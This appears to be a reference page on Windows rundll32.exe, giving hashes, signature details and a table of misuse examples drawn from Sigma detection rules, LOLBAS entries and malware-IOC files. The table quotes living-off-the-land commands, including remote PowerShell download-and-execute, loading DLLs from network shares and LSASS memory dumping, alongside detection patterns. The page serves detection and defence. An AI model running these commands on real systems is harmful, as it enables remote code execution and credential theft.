rundll32.exe

  • File Path: C:\Windows\system32\rundll32.exe
  • Description: Windows host process (Rundll32)

Hashes

Type Hash
MD5 44B041922105E01BFD0D096123F7D312
SHA1 84DDB2B3D1158485B2B66867CA9452930A258EDD
SHA256 F1DC9560D0C381C78304D94F7BA469490017D9728A03C2DD32C3BE957FC9F923
SHA384 825A5C8D7265D3F77D49E270F1D1A0F564C3FF23DC755B8FF86FDE698BF89B0311E28C51A3CE790284B72A342492722A
SHA512 F8EC1BAB25EBB3107AAF59CF687E043ABF33A2839B4F5557197472BE18F0AB3788878417E724456BF9D30E237BBA9179AB87803EC410F0F9A5C68631F8F17180
SSDEEP 1536:OM81xna/qB3NhUNfkze1+yWiYcWUoBmtSWRuln5IUmDjoX:l7/o3NhOfk7y7YsdtpRuln5I
IMP 4DB27267734D1576D75C991DC70F68AC
PESHA1 0689A2BEDC094FE12F3C0517C0991DD7F842B2C6
PE256 335ED9EB6223407990A540AA4136E7D75CD41E3A50A016CD746A98FAF967F817

Runtime Data

Loaded Modules:

Path
C:\Windows\System32\combase.dll
C:\Windows\System32\imagehlp.dll
C:\Windows\System32\KERNEL32.DLL
C:\Windows\System32\KERNELBASE.dll
C:\Windows\System32\msvcrt.dll
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32\RPCRT4.dll
C:\Windows\system32\rundll32.exe
C:\Windows\System32\shcore.dll
C:\Windows\System32\ucrtbase.dll

Signature

  • Status: Signature verified.
  • Serial: 3300000266BD1580EFA75CD6D3000000000266
  • Thumbprint: A4341B9FD50FB9964283220A36A1EF6F6FAA7840
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: RUNDLL32.EXE.MUI
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.19041.1 (WinBuild.160101.0800)
  • Product Version: 10.0.19041.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 64-bit

File Scan

  • VirusTotal Detections: 0/76
  • VirusTotal Link: https://www.virustotal.com/gui/file/f1dc9560d0c381c78304d94f7ba469490017d9728a03c2dd32c3be957fc9f923/detection

File Similarity (ssdeep match)

File Score
C:\windows\system32\rundll32.exe 40
C:\Windows\system32\rundll32.exe 43
C:\Windows\system32\rundll32.exe 35
C:\Windows\system32\rundll32.exe 46
C:\WINDOWS\system32\rundll32.exe 41
C:\Windows\SysWOW64\rundll32.exe 40
C:\Windows\SysWOW64\rundll32.exe 40
C:\Windows\SysWOW64\rundll32.exe 41
C:\Windows\SysWOW64\rundll32.exe 36
C:\windows\SysWOW64\rundll32.exe 41
C:\WINDOWS\SysWOW64\rundll32.exe 46

Possible Misuse

The following table contains possible examples of rundll32.exe being misused. While rundll32.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma win_invoke_obfuscation_via_rundll_services_security.yml - 'rundll32.exe' DRL 1.0
sigma win_invoke_obfuscation_via_use_rundll32_services_security.yml title: Invoke-Obfuscation Via Use Rundll32 DRL 1.0
sigma win_invoke_obfuscation_via_use_rundll32_services_security.yml description: Detects Obfuscated Powershell via use Rundll32 in Scripts DRL 1.0
sigma win_invoke_obfuscation_via_use_rundll32_services_security.yml - 'rundll32' DRL 1.0
sigma win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn DRL 1.0
sigma win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml - 'rundll32' DRL 1.0
sigma win_user_driver_loaded.yml - '\Windows\System32\rundll32.exe' DRL 1.0
sigma win_invoke_obfuscation_via_rundll_services.yml ImagePath\|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' DRL 1.0
sigma win_invoke_obfuscation_via_use_rundll32_services.yml title: Invoke-Obfuscation Via Use Rundll32 DRL 1.0
sigma win_invoke_obfuscation_via_use_rundll32_services.yml description: Detects Obfuscated Powershell via use Rundll32 in Scripts DRL 1.0
sigma win_invoke_obfuscation_via_use_rundll32_services.yml ImagePath\|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value\|invoke\|comspec\|iex).*"' DRL 1.0
sigma win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn DRL 1.0
sigma win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml - 'rundll32' DRL 1.0
sigma sysmon_susp_powershell_rundll32.yml title: PowerShell Rundll32 Remote Thread Creation DRL 1.0
sigma sysmon_susp_powershell_rundll32.yml description: Detects PowerShell remote thread creation in Rundll32.exe DRL 1.0
sigma sysmon_susp_powershell_rundll32.yml TargetImage\|endswith: '\rundll32.exe' DRL 1.0
sigma driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn DRL 1.0
sigma driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml - 'rundll32' DRL 1.0
sigma file_event_win_creation_system_file.yml - '\rundll32.exe' DRL 1.0
sigma file_event_win_susp_clr_logs.yml - 'rundll32' DRL 1.0
sigma file_event_win_susp_clr_logs.yml - https://twitter.com/SBousseaden/status/1388064061087260675 - rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process DRL 1.0
sigma file_event_win_win_shell_write_susp_directory.yml # - '\rundll32.exe' DRL 1.0
sigma image_load_mimikatz_inmemory_detection.yml Image: 'C:\Windows\System32\rundll32.exe' DRL 1.0
sigma image_load_suspicious_dbghelp_dbgcore_load.yml - '\rundll32.exe' DRL 1.0
sigma net_connection_win_rundll32_net_connections.yml title: Rundll32 Internet Connection DRL 1.0
sigma net_connection_win_rundll32_net_connections.yml description: Detects a rundll32 that communicates with public IP addresses DRL 1.0
sigma net_connection_win_rundll32_net_connections.yml Image\|endswith: '\rundll32.exe' DRL 1.0
sigma posh_pm_invoke_obfuscation_via_rundll.yml Payload\|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' DRL 1.0
sigma posh_pm_invoke_obfuscation_via_use_rundll32.yml title: Invoke-Obfuscation Via Use Rundll32 DRL 1.0
sigma posh_pm_invoke_obfuscation_via_use_rundll32.yml description: Detects Obfuscated Powershell via use Rundll32 in Scripts DRL 1.0
sigma posh_pm_invoke_obfuscation_via_use_rundll32.yml Payload\|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value\|invoke\|comspec\|iex).*"' DRL 1.0
sigma posh_ps_invoke_obfuscation_via_rundll.yml ScriptBlockText\|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' DRL 1.0
sigma posh_ps_invoke_obfuscation_via_use_rundll32.yml title: Invoke-Obfuscation Via Use Rundll32 DRL 1.0
sigma posh_ps_invoke_obfuscation_via_use_rundll32.yml description: Detects Obfuscated Powershell via use Rundll32 in Scripts DRL 1.0
sigma posh_ps_invoke_obfuscation_via_use_rundll32.yml ScriptBlockText\|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value\|invoke\|comspec\|iex).*"' DRL 1.0
sigma posh_ps_suspicious_keywords.yml - 'rundll32' DRL 1.0
sigma proc_access_win_lsass_dump_comsvcs_dll.yml description: Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass. DRL 1.0
sigma proc_access_win_lsass_dump_comsvcs_dll.yml SourceImage: 'C:\Windows\System32\rundll32.exe' DRL 1.0
sigma proc_creation_win_apt_equationgroup_dll_u_load.yml Image\|endswith: '\rundll32.exe' DRL 1.0
sigma proc_creation_win_apt_lazarus_activity_apr21.yml - 'C:\Windows\System32\rundll32.exe' DRL 1.0
sigma proc_creation_win_apt_lazarus_loader.yml - 'rundll32.exe ' DRL 1.0
sigma proc_creation_win_apt_sofacy.yml - 'rundll32.exe' DRL 1.0
sigma proc_creation_win_apt_taidoor.yml - 'rundll32.exe' DRL 1.0
sigma proc_creation_win_apt_unc2452_cmds.yml - 'rundll32.exe' DRL 1.0
sigma proc_creation_win_apt_unc2452_cmds.yml ParentImage\|endswith: '\rundll32.exe' DRL 1.0
sigma proc_creation_win_apt_unc2452_cmds.yml - 'rundll32 c:\windows\' DRL 1.0
sigma proc_creation_win_apt_unc2452_ps.yml - 'rundll32 c:\windows' DRL 1.0
sigma proc_creation_win_apt_unc2452_ps.yml - 'process call create "rundll32 c:\windows' DRL 1.0
sigma proc_creation_win_apt_zxshell.yml - '\rundll32.exe' DRL 1.0
sigma proc_creation_win_bad_opsec_sacrificial_processes.yml description: 'Detects attackers using tooling with bad opsec defaults e.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run, one trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.' DRL 1.0
sigma proc_creation_win_bad_opsec_sacrificial_processes.yml - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32 DRL 1.0
sigma proc_creation_win_bad_opsec_sacrificial_processes.yml Image\|endswith: '\rundll32.exe' DRL 1.0
sigma proc_creation_win_bad_opsec_sacrificial_processes.yml CommandLine\|endswith: '\rundll32.exe' DRL 1.0
sigma proc_creation_win_c3_load_by_rundll32.yml title: F-Secure C3 Load by Rundll32 DRL 1.0
sigma proc_creation_win_c3_load_by_rundll32.yml - 'rundll32.exe' DRL 1.0
sigma proc_creation_win_cobaltstrike_load_by_rundll32.yml title: CobaltStrike Load by Rundll32 DRL 1.0
sigma proc_creation_win_cobaltstrike_load_by_rundll32.yml description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line. DRL 1.0
sigma proc_creation_win_cobaltstrike_load_by_rundll32.yml - 'rundll32.exe' DRL 1.0
sigma proc_creation_win_crime_fireball.yml description: Detects Archer malware invocation via rundll32 DRL 1.0
sigma proc_creation_win_crime_fireball.yml - 'rundll32.exe' DRL 1.0
sigma proc_creation_win_html_help_spawn.yml - '\rundll32.exe' DRL 1.0
sigma proc_creation_win_impacket_lateralization.yml # runs %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} but parent command is explorer.exe DRL 1.0
sigma proc_creation_win_invoke_obfuscation_via_rundll.yml CommandLine\|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' DRL 1.0
sigma proc_creation_win_invoke_obfuscation_via_use_rundll32.yml title: Invoke-Obfuscation Via Use Rundll32 DRL 1.0
sigma proc_creation_win_invoke_obfuscation_via_use_rundll32.yml description: Detects Obfuscated Powershell via use Rundll32 in Scripts DRL 1.0
sigma proc_creation_win_invoke_obfuscation_via_use_rundll32.yml CommandLine\|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value\|invoke\|comspec\|iex).*"' DRL 1.0
sigma proc_creation_win_lolbins_by_office_applications.yml - 'rundll32' DRL 1.0
sigma proc_creation_win_lolbins_with_wmiprvse_parent_process.yml - 'rundll32' DRL 1.0
sigma proc_creation_win_malware_notpetya.yml Image\|endswith: '\rundll32.exe' DRL 1.0
sigma proc_creation_win_malware_trickbot_wermgr.yml description: Detects Trickbot malware process tree pattern in which rundll32.exe is parent of wermgr.exe DRL 1.0
sigma proc_creation_win_malware_trickbot_wermgr.yml - '\rundll32.exe' DRL 1.0
sigma proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn DRL 1.0
sigma proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml - 'rundll32' DRL 1.0
sigma proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml - 'rundll32' DRL 1.0
sigma proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml - '*rundll32*' DRL 1.0
sigma proc_creation_win_office_shell.yml - '\rundll32.exe' DRL 1.0
sigma proc_creation_win_outlook_shell.yml # - '\rundll32.exe' # see comment below DRL 1.0
sigma proc_creation_win_outlook_shell.yml # Several FPs with rundll32.exe - we started excluding specific use cases and DRL 1.0
sigma proc_creation_win_outlook_shell.yml # ended commenting out all rundll32.exe sub processes DRL 1.0
sigma proc_creation_win_outlook_shell.yml # Image\|endswith: '\rundll32.exe' DRL 1.0
sigma proc_creation_win_powershell_dll_execution.yml - '\rundll32.exe' DRL 1.0
sigma proc_creation_win_powershell_dll_execution.yml - 'Windows-Hostprozess (Rundll32)' DRL 1.0
sigma proc_creation_win_process_dump_rundll32_comsvcs.yml title: Process Dump via Rundll32 and Comsvcs.dll DRL 1.0
sigma proc_creation_win_process_dump_rundll32_comsvcs.yml - 'rundll32' DRL 1.0
sigma proc_creation_win_redmimicry_winnti_proc.yml - rundll32.exe DRL 1.0
sigma proc_creation_win_renamed_binary.yml - 'rundll32.exe' DRL 1.0
sigma proc_creation_win_renamed_binary.yml - '\rundll32.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - 'rundll32.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - '\rundll32.exe' DRL 1.0
sigma proc_creation_win_rundll32_not_from_c_drive.yml title: Rundll32 From Abnormal Drive DRL 1.0
sigma proc_creation_win_rundll32_not_from_c_drive.yml description: Detects rundll32.exe executing from an abnormal drive such as a mounted ISO. DRL 1.0
sigma proc_creation_win_rundll32_not_from_c_drive.yml Image\|endswith: '\rundll32.exe' DRL 1.0
sigma proc_creation_win_rundll32_registered_com_objects.yml title: Rundll32 Registered COM Objects DRL 1.0
sigma proc_creation_win_rundll32_registered_com_objects.yml - https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90 DRL 1.0
sigma proc_creation_win_rundll32_registered_com_objects.yml Image\|endswith: \rundll32.exe DRL 1.0
sigma proc_creation_win_rundll32_without_parameters.yml title: Rundll32 Without Parameters DRL 1.0
sigma proc_creation_win_rundll32_without_parameters.yml description: Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module DRL 1.0
sigma proc_creation_win_rundll32_without_parameters.yml CommandLine: 'rundll32.exe' DRL 1.0
sigma proc_creation_win_run_executable_invalid_extension.yml description: Detects the execution of rundll32 with a command line that doesn't contain a .dll file DRL 1.0
sigma proc_creation_win_run_executable_invalid_extension.yml Image\|endswith: '\rundll32.exe' DRL 1.0
sigma proc_creation_win_script_event_consumer_spawn.yml - '\rundll32.exe' DRL 1.0
sigma proc_creation_win_shell_spawn_susp_program.yml - '\rundll32.exe' DRL 1.0
sigma proc_creation_win_susp_child_process_as_system_.yml Image\|endswith: '\rundll32.exe' DRL 1.0
sigma proc_creation_win_susp_comsvcs_procdump.yml description: Detects process memory dump via comsvcs.dll and rundll32 DRL 1.0
sigma proc_creation_win_susp_comsvcs_procdump.yml Image\|endswith: '\rundll32.exe' DRL 1.0
sigma proc_creation_win_susp_comsvcs_procdump.yml OriginalFileName: 'RUNDLL32.EXE' DRL 1.0
sigma proc_creation_win_susp_control_dll_load.yml description: Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits DRL 1.0
sigma proc_creation_win_susp_control_dll_load.yml Image\|endswith: '\rundll32.exe ' DRL 1.0
sigma proc_creation_win_susp_curl_start_combo.yml - https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983 DRL 1.0
sigma proc_creation_win_susp_emotet_rundll32_execution.yml title: Emotet RunDLL32 Process Creation DRL 1.0
sigma proc_creation_win_susp_emotet_rundll32_execution.yml description: Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL DRL 1.0
sigma proc_creation_win_susp_emotet_rundll32_execution.yml - '\rundll32.exe' DRL 1.0
sigma proc_creation_win_susp_emotet_rundll32_execution.yml - '\tracker.exe' #When Visual Studio compile NodeJS program, it might use MSBuild to create tracker.exe and then, the tracker.exe fork rundll32.exe DRL 1.0
sigma proc_creation_win_susp_odbcconf.yml Image\|endswith: '\rundll32.exe' DRL 1.0
sigma proc_creation_win_susp_pcwutl.yml Image\|endswith: '\rundll32.exe' DRL 1.0
sigma proc_creation_win_susp_powershell_parent_process.yml - '\rundll32.exe' DRL 1.0
sigma proc_creation_win_susp_rundll32_activity.yml title: Suspicious Rundll32 Activity DRL 1.0
sigma proc_creation_win_susp_rundll32_activity.yml description: Detects suspicious process related to rundll32 based on arguments DRL 1.0
sigma proc_creation_win_susp_rundll32_by_ordinal.yml description: Detects suspicious calls of DLLs in rundll32.dll exports by ordinal DRL 1.0
sigma proc_creation_win_susp_rundll32_by_ordinal.yml Image\|endswith: '\rundll32.exe' DRL 1.0
sigma proc_creation_win_susp_rundll32_inline_vbs.yml title: Suspicious Rundll32 Invoking Inline VBScript DRL 1.0
sigma proc_creation_win_susp_rundll32_inline_vbs.yml description: Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452 DRL 1.0
sigma proc_creation_win_susp_rundll32_inline_vbs.yml - 'rundll32.exe' DRL 1.0
sigma proc_creation_win_susp_rundll32_js_runhtmlapplication.yml title: Rundll32 JS RunHTMLApplication Pattern DRL 1.0
sigma proc_creation_win_susp_rundll32_js_runhtmlapplication.yml description: Detects suspicious command line patterns used when rundll32 is used to run JavaScript code DRL 1.0
sigma proc_creation_win_susp_rundll32_js_runhtmlapplication.yml - 'rundll32' DRL 1.0
sigma proc_creation_win_susp_rundll32_no_params.yml title: Suspicious Rundll32 Without Any CommandLine Params DRL 1.0
sigma proc_creation_win_susp_rundll32_no_params.yml description: Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity DRL 1.0
sigma proc_creation_win_susp_rundll32_no_params.yml CommandLine\|endswith: '\rundll32.exe' DRL 1.0
sigma proc_creation_win_susp_rundll32_script_run.yml title: Suspicious Rundll32 Script in CommandLine DRL 1.0
sigma proc_creation_win_susp_rundll32_script_run.yml description: Detects suspicious process related to rundll32 based on arguments DRL 1.0
sigma proc_creation_win_susp_rundll32_script_run.yml - rundll32 DRL 1.0
sigma proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml title: Suspicious Rundll32 Setupapi.dll Activity DRL 1.0
sigma proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml ParentImage\|endswith: '\rundll32.exe' DRL 1.0
sigma proc_creation_win_susp_rundll32_sys.yml title: Suspicious Rundll32 Activity Invoking Sys File DRL 1.0
sigma proc_creation_win_susp_rundll32_sys.yml description: Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452 DRL 1.0
sigma proc_creation_win_susp_rundll32_sys.yml CommandLine\|contains: 'rundll32.exe' DRL 1.0
sigma proc_creation_win_susp_servu_process_pattern.yml - '\rundll32.exe' DRL 1.0
sigma proc_creation_win_susp_shell_spawn_by_java.yml - '\rundll32.exe' DRL 1.0
sigma proc_creation_win_susp_shell_spawn_by_java_keytool.yml - '\rundll32.exe' DRL 1.0
sigma proc_creation_win_susp_shimcache_flush.yml - 'rundll32' DRL 1.0
sigma proc_creation_win_susp_spoolsv_child_processes.yml Image\|endswith: \rundll32.exe DRL 1.0
sigma proc_creation_win_susp_spoolsv_child_processes.yml CommandLine\|endswith: rundll32.exe DRL 1.0
sigma proc_creation_win_susp_target_location_shell32.yml Image\|endswith: '\rundll32.exe' DRL 1.0
sigma proc_creation_win_susp_webdav_client_execution.yml description: A General detection for svchost.exe spawning rundll32.exe with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server). DRL 1.0
sigma proc_creation_win_susp_webdav_client_execution.yml Image\|endswith: '\rundll32.exe' DRL 1.0
sigma proc_creation_win_susp_wmic_proc_create_rundll32.yml title: Suspicious WMI Execution Using Rundll32 DRL 1.0
sigma proc_creation_win_susp_wmic_proc_create_rundll32.yml description: Detects WMI executing rundll32 DRL 1.0
sigma proc_creation_win_susp_wmic_proc_create_rundll32.yml - 'rundll32' DRL 1.0
sigma proc_creation_win_system_exe_anomaly.yml - '\rundll32.exe' DRL 1.0
sigma proc_creation_win_vmtoolsd_susp_child_process.yml - '\rundll32.exe' DRL 1.0
sigma registry_event_modify_screensaver_binary_path.yml - '\rundll32.exe' DRL 1.0
sigma driver_load_invoke_obfuscation_via_rundll_services.yml ImagePath\|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' DRL 1.0
sigma driver_load_invoke_obfuscation_via_use_rundll32_services.yml title: Invoke-Obfuscation Via Use Rundll32 DRL 1.0
sigma driver_load_invoke_obfuscation_via_use_rundll32_services.yml description: Detects Obfuscated Powershell via use Rundll32 in Scripts DRL 1.0
sigma driver_load_invoke_obfuscation_via_use_rundll32_services.yml ImagePath\|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value\|invoke\|comspec\|iex).*"' DRL 1.0
sigma win_possible_privilege_escalation_using_rotten_potato.yml Image\|endswith: '\rundll32.exe' DRL 1.0
LOLBAS Dfsvc.yml - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo  
LOLBAS Rundll32.yml Name: Rundll32.exe  
LOLBAS Rundll32.yml - Command: rundll32.exe AllTheThingsx64,EntryPoint  
LOLBAS Rundll32.yml - Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint  
LOLBAS Rundll32.yml Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute.  
LOLBAS Rundll32.yml - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"  
LOLBAS Rundll32.yml Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.  
LOLBAS Rundll32.yml - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");  
LOLBAS Rundll32.yml Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.  
LOLBAS Rundll32.yml - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}  
LOLBAS Rundll32.yml Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.  
LOLBAS Rundll32.yml - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")  
LOLBAS Rundll32.yml Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.  
LOLBAS Rundll32.yml - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain  
LOLBAS Rundll32.yml Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).  
LOLBAS Rundll32.yml - Command: rundll32.exe -sta {CLSID}  
LOLBAS Rundll32.yml Description: Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID.  
LOLBAS Rundll32.yml - Path: C:\Windows\System32\rundll32.exe  
LOLBAS Rundll32.yml - Path: C:\Windows\SysWOW64\rundll32.exe  
LOLBAS Rundll32.yml - IOC: Outbount Internet/network connections made from rundll32  
LOLBAS Rundll32.yml - Link: https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/  
LOLBAS Rundll32.yml - Link: https://github.com/sailay1996/misc-bin/blob/master/rundll32.md  
LOLBAS Rundll32.yml - Link: https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90  
LOLBAS Advpack.yml Description: Utility for installing software and drivers with rundll32.exe  
LOLBAS Advpack.yml - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,  
LOLBAS Advpack.yml - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1,  
LOLBAS Advpack.yml - Command: rundll32.exe advpack.dll,RegisterOCX test.dll  
LOLBAS Advpack.yml - Command: rundll32.exe advpack.dll,RegisterOCX calc.exe  
LOLBAS Advpack.yml - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe"  
LOLBAS comsvcs.yml - Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"  
LOLBAS Dfshim.yml - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo  
LOLBAS Ieadvpack.yml - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,  
LOLBAS Ieadvpack.yml - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1,  
LOLBAS Ieadvpack.yml - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll  
LOLBAS Ieadvpack.yml - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe  
LOLBAS Ieadvpack.yml - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe"  
LOLBAS Ieframe.yml - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"  
LOLBAS Mshtml.yml - Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta"  
LOLBAS Pcwutl.yml - Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe  
LOLBAS Pcwutl.yml - Analysis: https://redcanary.com/threat-detection-report/techniques/rundll32/  
LOLBAS Setupapi.yml - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf  
LOLBAS Setupapi.yml - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf  
LOLBAS Shdocvw.yml - Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"  
LOLBAS Shell32.yml - Command: rundll32.exe shell32.dll,Control_RunDLL payload.dll  
LOLBAS Shell32.yml - Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe  
LOLBAS Shell32.yml - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi"  
LOLBAS Syssetup.yml - Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf  
LOLBAS Syssetup.yml - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf  
LOLBAS Url.yml - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.hta"  
LOLBAS Url.yml - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url"  
LOLBAS Url.yml - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e  
LOLBAS Url.yml - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe  
LOLBAS Url.yml - Command: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e  
LOLBAS Url.yml - Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta  
LOLBAS Zipfldr.yml - Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe  
LOLBAS Zipfldr.yml - Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e  
malware-ioc misp-dukes-operation-ghost-event.json "value": "Rundll32 - T1085", © ESET 2014-2018
malware-ioc misp-dukes-operation-ghost-event.json "tag_name": "misp-galaxy:mitre-attack-pattern=\"Rundll32 - T1085\"", © ESET 2014-2018
malware-ioc misp-dukes-operation-ghost-event.json "description": "The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.\n\nRundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code> This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)", © ESET 2014-2018
malware-ioc misp-dukes-operation-ghost-event.json "name": "misp-galaxy:mitre-attack-pattern=\"Rundll32 - T1085\"", © ESET 2014-2018
malware-ioc invisimole.yar $s13 = "rundll32.exe \"%s\",StartUI" © ESET 2014-2018
malware-ioc misp_invisimole.json "value": "%WINDIR%\\SysWOW64\\drivers\\Rundll32.exe", © ESET 2014-2018
malware-ioc misp_invisimole.json "value": "Rundll32 - T1085", © ESET 2014-2018
